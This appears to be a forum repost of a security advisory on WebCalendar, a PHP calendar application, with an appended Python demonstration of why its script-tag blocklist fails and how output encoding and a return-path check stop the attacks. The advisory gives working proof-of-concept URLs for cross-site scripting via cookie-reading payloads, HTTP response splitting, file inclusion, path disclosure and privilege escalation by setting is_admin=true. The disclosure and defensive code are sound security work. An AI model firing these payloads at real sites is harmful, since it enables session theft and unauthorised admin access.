Security Alerts and vulnerabilities » Web Calendar Application

#1
WebCalendar is a PHP application used to maintain a calendar for a single user or an intranet group of users. It can also be configured as an event calendar.

Web: http://webcalendar.sourceforge.net

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Cross Site Scripting Vulnerabilities in various scripts.

A1. WebCalendar checks for the <script>any</script> form of XSS attack but does not check for <img src ...> based attacks. To test the vulnerabilities you can try the following POCs:

http://<site-with-webcalendar>/demo/view_entry.php?idA972"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&date=20041001

http://<site-with-webcalendar>/demo/view_d.php?ide7"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)%20height=0%20width=0>&date=20041009

http://<site-with-webcalendar>/demo/usersel.php?form=editentryform.elements[20];%0d%0aalert(document.cookie);//&listid=&users=demo,demo1,demo2

http://<site-with-webcalendar>/demo/datesel.php?form=editentryform.elements[20].rpt_day.selectedIndex%20=%20day%20-%201;alert(document.cookie);//"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year&date=20041001

http://<site-with-webcalendar>/demo/datesel.php?form=editentryform&fday=rpt_day"%20onclick=javascript:alert(document.cookie)>&fmonth=rpt_month&fyear=rpt_year&date=20041001

http://<site-with-webcalendar>/demo/includes/trailer.php?user="><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>

http://<site-with-webcalendar>/demo/includes/styles.php?FONTS=asdf}%0A--></style><script>alert(document.cookie)</script>

NOTE: Almost any GLOBAL parameter in this script is vulnerable.

B. HTTP Response Splitting Error

B1. Due to poor input validation in the script login.php, HTTP Response Splitting attacks are possible. You can try the vulnerability with the following POC:

http://<site-with-webcalendar>/demo/login.php?return_path=%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0dContent-Type:text/html%0d%0aContent-Length:9%0d%0aHi to all

C. Possible code execution

C1. If an attacker is able to upload a file via FTP or some other means to the web directory, there is a flaw that allows executing any file in the web tree. To try the vulnerability you can use this URL:

http://<site-with-webcalendar>/demo/includes/init.php?user_inc=the_file_that_you_upload_via_ftp_or_other

Note: this is also a full path disclosure.

D. Full Path Disclosure

D1. Because of poor validation of the parameter encoded_login in the PHP script validate.php, there is a vulnerability that shows the full path of the script on the web server.

http://<site-with-webcalendar>/demo/includes/validate.php?encoded_login (Full Path Disclosure)

E. Admin Privileges

E1. To perform various actions you need to be the administrator of the WebCalendar application, but various scripts are vulnerable to Variable Poisoning attacks. Privilege escalation is possible using the following methods:

Example 1: You don't have permission:
http://<site-with-webcalendar>/demo/view_entry.php?idA972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true
But using this, you do:
http://<site-with-webcalendar>/demo/view_entry.php?idA972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true

Example 2:
http://<site-with-webcalendar>/demo/view_entry.php?idA972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true&id

Example 3:
No permission -> http://webcalendar.sourceforge.net/demo/upcoming.php
Permission granted -> http://webcalendar.sourceforge.net/demo/up...bled=true&public_access=Y

Notes
~~~~~

The poor method used to protect against XSS attacks in the script functions.php is the following:

    // This code is a temporary hack to make the application work when
    // register_globals is set to Off in php.ini (the default setting in
    // PHP 4.2.0 and after).
    if ( ! empty ( $HTTP_GET_VARS ) ) {
      while (list($key, $val) = @each($HTTP_GET_VARS)) {
        // don't allow anything to have <script> in it...
        if ( ! is_array ( $val ) ) {
          if ( preg_match ( "/<\s*script/i", $val ) ) {
            echo "Security violation!";
            exit;
          }
        }
        // (remainder of the loop body omitted in the advisory)
      }
    }

It is very easy to bypass these basic security checks by using Unicode encoded strings, or any other valid XSS attack, such as <img src attacks.

More Notes
~~~~~~~~~~

The developers of WebCalendar (in particular Jeff Hoover) have shown seriousness in their fixes and responses regarding these errors.

The fix:
~~~~~~~~

The problems have been fixed in the CVS repository.
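Added example (not code from the advisory, the poster, or WebCalendar): the Python script below transcribes the functions.php blocklist quoted in the post, feeds it the advisory's <img onload> and onclick payloads to show they pass while a plain <script> tag is caught, and contrasts echoing a parameter straight into an HTML attribute with output encoding, which neutralises every payload without any blocklist. It also models login.php's return_path landing in a Location header, showing that the advisory's POC turns one redirect into two responses on the wire, next to a relative-path check that rejects it. The render_* template, the TagCollector helper and the safe_return_path policy are this example's own assumptions, not WebCalendar's code; the payload strings are transcribed (URL-decoded) from the POCs above.

```python
import html
import re
import urllib.parse
from html.parser import HTMLParser
from typing import List, Optional, Tuple

# Python transcription of the check quoted from functions.php:
#     preg_match ( "/<\s*script/i", $val )
SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)


def webcalendar_filter_accepts(value: str) -> bool:
    """True when the blocklist quoted in the advisory would let the value through."""
    return SCRIPT_TAG.search(value) is None


# Hypothetical template standing in for the vulnerable scripts (trailer.php,
# datesel.php, ...), which echo a request parameter straight into an attribute.
def render_unescaped(value: str) -> str:
    return f'<input type="hidden" name="user" value="{value}">'


def render_escaped(value: str) -> str:
    """Hardened form: encode for the attribute context at output time."""
    return f'<input type="hidden" name="user" value="{html.escape(value, quote=True)}">'


class TagCollector(HTMLParser):
    """Records (tag, attribute names) the way a browser-like parser sees them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[Tuple[str, List[str]]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, [name for name, _ in attrs]))


def injects(markup: str) -> bool:
    """True when the rendered markup contains a tag or attribute the template
    never had, i.e. the parameter broke out of its attribute value."""
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags != [("input", ["type", "name", "value"])]


# Payloads transcribed (URL-decoded) from the advisory's POCs, plus a plain
# <script> payload to show what the blocklist does catch.
IMG_ONLOAD = ('"><img src=http://images.sourceforge.net/images/head_bg_new.gif '
              'onload=javascript:alert(document.cookie)>')
ONCLICK_ATTR = 'rpt_day" onclick=javascript:alert(document.cookie)>'
PLAIN_SCRIPT = '<script>alert(document.cookie)</script>'

# --- HTTP response splitting via login.php?return_path= ---------------------

# The advisory's POC value, joined across the page's line wraps.
RETURN_PATH_POC = ("%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a"
                   "%0d%0dContent-Type:text/html%0d%0aContent-Length:9%0d%0aHi to all")


def build_redirect_unchecked(return_path: str) -> str:
    """Models a script that decodes return_path and puts it in a Location header."""
    return ("HTTP/1.1 302 Found\r\nLocation: "
            + urllib.parse.unquote(return_path) + "\r\n\r\n")


def response_count(raw: str) -> int:
    """How many responses a client reading this byte stream would see."""
    return raw.count("HTTP/1.1 ")


def safe_return_path(value: str) -> Optional[str]:
    """Hardened check (this example's own policy): accept only a relative path on
    the same site, with no control characters and no scheme or host part."""
    decoded = urllib.parse.unquote(value)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        return None          # CR/LF here is exactly the splitting vector
    parts = urllib.parse.urlsplit(decoded)
    if parts.scheme or parts.netloc or decoded.startswith("/"):
        return None          # "http://...", "//evil.example/", "javascript:" ...
    return decoded


if __name__ == "__main__":
    for name, payload in (("img onload", IMG_ONLOAD), ("onclick", ONCLICK_ATTR),
                          ("<script>", PLAIN_SCRIPT)):
        print(f"{name:10} blocklist accepts: {webcalendar_filter_accepts(payload)}")
    for name, payload in (("img onload", IMG_ONLOAD), ("onclick", ONCLICK_ATTR)):
        print(f"{name:10} injects unescaped: {injects(render_unescaped(payload))}, "
              f"escaped: {injects(render_escaped(payload))}")
    print("responses on the wire:", response_count(build_redirect_unchecked(RETURN_PATH_POC)))
    print("safe_return_path(POC) =", safe_return_path(RETURN_PATH_POC))
```

The point the check makes: the blocklist only answers "does it contain <script", so any payload that opens a different tag or just closes the attribute and adds an event handler passes; encoding for the output context makes the question irrelevant. For return_path, rejecting control characters and anything with a scheme or host is what closes both the splitting and the open-redirect variants at once.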